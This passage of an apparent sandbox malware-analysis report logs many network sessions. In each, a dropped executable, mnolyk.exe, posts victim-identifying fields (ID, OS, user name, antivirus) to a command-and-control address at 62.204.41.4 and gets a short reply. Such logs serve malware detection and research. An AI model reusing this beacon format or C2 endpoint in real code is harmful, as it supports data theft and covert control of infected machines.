                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:57.207439899 CET131INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          260192.168.2.64998362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:03.190207005 CET401OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:03.259171963 CET401INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          261192.168.2.64998462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:03.441087008 CET402OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:03.505045891 CET402INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          262192.168.2.64998562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:03.672174931 CET403OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:03.735590935 CET403INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          263192.168.2.64998662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:03.914623976 CET404OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:03.981905937 CET404INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          264192.168.2.64998762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:04.169863939 CET405OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:04.233376026 CET405INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          265192.168.2.64998862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:04.410732031 CET406OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:04.476504087 CET406INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          266192.168.2.64998962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:05.120373964 CET407OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:05.187333107 CET407INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          267192.168.2.64999062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:05.389457941 CET408OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:05.453105927 CET408INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          268192.168.2.64999162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:05.764040947 CET409OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:05.828155994 CET409INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          269192.168.2.64999262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:06.575938940 CET410OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:06.642028093 CET410INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          27192.168.2.64974562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:57.394746065 CET132OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:57.457775116 CET132INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          270192.168.2.64999362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:07.121548891 CET411OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:07.187078953 CET411INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          271192.168.2.64999462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:09.136023998 CET412OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:09.200330019 CET412INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          272192.168.2.64999562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:09.662326097 CET413OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:09.728123903 CET413INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          273192.168.2.64999662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:09.912451982 CET414OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:09.978259087 CET414INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          274192.168.2.64999762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:10.169392109 CET415OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:10.236095905 CET415INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          275192.168.2.64999862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:10.416841030 CET416OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:10.481199980 CET416INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          276192.168.2.64999962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:10.659482956 CET417OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:10.723718882 CET417INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          277192.168.2.65000062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:10.893167019 CET418OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:10.958776951 CET418INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          278192.168.2.65000162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:11.159822941 CET419OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:11.227298975 CET419INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          279192.168.2.65000262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:11.408989906 CET420OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
